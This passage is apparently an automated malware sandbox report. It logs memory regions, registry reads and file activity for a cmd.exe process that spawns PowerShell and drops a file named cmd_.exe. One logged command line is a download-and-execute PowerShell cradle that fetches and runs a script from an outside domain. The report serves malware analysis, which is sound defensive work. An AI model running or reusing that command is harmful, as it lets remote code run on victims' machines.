| private_0x00000000003d0000 | 0x003d0000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x00657fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x01beffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001bf0000 | 0x01bf0000 | 0x01f32fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01f40000 | 0x0220efff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x4acf0000 | 0x4ad48fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x771d0000 | 0x772c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x772d0000 | 0x773eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winbrand.dll | 0x7fef90f0000 | 0x7fef90f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefd430000 | 0x7fefd49afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefdd90000 | 0x7fefdd9dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefde80000 | 0x7fefdf1efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefdf20000 | 0x7fefe028fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefe030000 | 0x7fefe05dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe060000 | 0x7fefe0c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefe4c0000 | 0x7fefe588fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff710000 | 0x7feff710fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\qj4SUKboE\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0x9e4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4acf0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x772d0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CMD.EXE, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x772e6d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x772e23d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x772d8290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x772e17e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-02 21:37:01 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10915093 |
|
1 |
Environment (14)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\qj4SUKboE\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #5: powershell.exe
598
19
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://brembotembo.com/1.dat\")) |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:41 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9e4 |
| Parent PID | 0xb94 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B5C
0x
A10
0x
A14
0x
910
0x
90C
0x
BD8
0x
BCC
0x
BF8
0x
610
0x
5A8
0x
51C
0x
BFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0007ffff | Private Memory | Readable, Writable |
|
|
|
- |
| powershell.exe.mui | 0x00080000 | 0x00082fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00280000 | 0x002e6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x00577fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00700fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000710000 | 0x00710000 | 0x01b0ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001b10000 | 0x01b10000 | 0x01c0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x01c10000 | 0x01c13fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001c20000 | 0x01c20000 | 0x01c20fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001c30000 | 0x01c30000 | 0x01c3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001c40000 | 0x01c40000 | 0x01d1efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x01d20000 | 0x01d23fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001d30000 | 0x01d30000 | 0x01daffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db | 0x01db0000 | 0x01dcffff | Memory Mapped File | Readable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000d.db | 0x01dd0000 | 0x01dfffff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01e00000 | 0x01e65fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001e70000 | 0x01e70000 | 0x01e70fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x01e82fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001e90000 | 0x01e90000 | 0x01e90fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01ebffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x01ecffff | Private Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x01ed0000 | 0x01ed2fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001ee0000 | 0x01ee0000 | 0x01ee0fff | Private Memory | Readable, Writable |
|
|
|
- |
| sorttbls.nlp | 0x01ef0000 | 0x01ef4fff | Memory Mapped File | Readable |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01f00000 | 0x01f07fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001f10000 | 0x01f10000 | 0x01f10fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001f20000 | 0x01f20000 | 0x01f20fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x01faffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x01fb0000 | 0x0227efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002280000 | 0x02280000 | 0x022fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002300000 | 0x02300000 | 0x02310fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002340000 | 0x02340000 | 0x023bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x027b2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortkey.nlp | 0x027c0000 | 0x02800fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x028cffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x028d0000 | 0x0298ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x0299ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029e0000 | 0x029e0000 | 0x02a5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02b0ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02c0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x1ac0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001ac10000 | 0x1ac10000 | 0x1b2dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b2e0000 | 0x1b2e0000 | 0x1b3e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b410000 | 0x1b410000 | 0x1b48ffff | Private Memory | Readable, Writable |
|
|
|
- |
| system.management.automation.dll | 0x1b490000 | 0x1b771fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000001b780000 | 0x1b780000 | 0x1b87ffff | Private Memory | Readable, Writable |
|
|
|
- |
| mscorrc.dll | 0x1b880000 | 0x1b8d3fff | Memory Mapped File | Readable |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74be0000 | 0x74ca8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x771d0000 | 0x772c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x772d0000 | 0x773eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x775c0000 | 0x775c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| powershell.exe | 0x13fe40000 | 0x13feb6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fee2eb0000 | 0x7fee3044fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x7fee3050000 | 0x7fee31bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.xml.ni.dll | 0x7fee31c0000 | 0x7fee3864fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fee3870000 | 0x7fee3987fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fee3990000 | 0x7fee3ba5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.ni.dll | 0x7fee3bb0000 | 0x7fee3c94fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee3ca0000 | 0x7fee3d49fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.core.ni.dll | 0x7fee3d50000 | 0x7fee407dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee4080000 | 0x7fee4bdcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x7fee4be0000 | 0x7fee5602fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee5610000 | 0x7fee64ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x7fee64f0000 | 0x7fee6e8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fee8f80000 | 0x7fee9018fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fef2a50000 | 0x7fef2abefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntshrui.dll | 0x7fef2f20000 | 0x7fef2f9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fef3670000 | 0x7fef36adfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fef36b0000 | 0x7fef36e1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fef36f0000 | 0x7fef3758fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fef3760000 | 0x7fef3811fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shdocvw.dll | 0x7fef75d0000 | 0x7fef7603fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shfolder.dll | 0x7fef7a80000 | 0x7fef7a86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| linkinfo.dll | 0x7fef93f0000 | 0x7fef93fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x7fefa190000 | 0x7fefa1e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cscapi.dll | 0x7fefa8c0000 | 0x7fefa8cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| slc.dll | 0x7fefaee0000 | 0x7fefaeeafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x7fefaf10000 | 0x7fefaf28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x7fefb2b0000 | 0x7fefb2dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefbb50000 | 0x7fefbba5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7fefbc00000 | 0x7fefbdf3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7fefc100000 | 0x7fefc22bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7fefc500000 | 0x7fefc50bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x7fefc6e0000 | 0x7fefc6fdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7fefc930000 | 0x7fefc976fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7fefcc30000 | 0x7fefcc46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x7fefd130000 | 0x7fefd152fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefd230000 | 0x7fefd23efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7fefd340000 | 0x7fefd34efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefd430000 | 0x7fefd49afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd540000 | 0x7fefd575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x7fefd580000 | 0x7fefd599fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefd710000 | 0x7fefd912fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefd970000 | 0x7fefd98efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7fefdb10000 | 0x7fefdce6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefdd90000 | 0x7fefdd9dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7fefdda0000 | 0x7fefde76fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefde80000 | 0x7fefdf1efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefdf20000 | 0x7fefe028fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefe030000 | 0x7fefe05dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe060000 | 0x7fefe0c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe0d0000 | 0x7fefe1fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7fefe2a0000 | 0x7fefe37afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefe4c0000 | 0x7fefe588fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7fefe590000 | 0x7fefe628fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x7fefe890000 | 0x7fefe8e1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe8f0000 | 0x7fefe960fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7fefe970000 | 0x7feff6f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff710000 | 0x7feff710fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff0005ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00060000 | 0x7ff00060000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0010ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00110000 | 0x7ff00110000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00190000 | 0x7ff00190000 | 0x7ff0019ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 76 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\qj4sukboe\appdata\local\temp\cmd_.exe | 174.00 KB |
MD5:
3e3d2e9fe0976c4c8d4c6be03f5d7c79
SHA1: b079b7235ac9ce53d564e8e81e1419f870fb7550 SHA256: 30e2f8e905e4596946e651627c450e3cc574fdf58ea6e41cdad1f06190a05216 |
|
|
Host Behavior
File (173)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
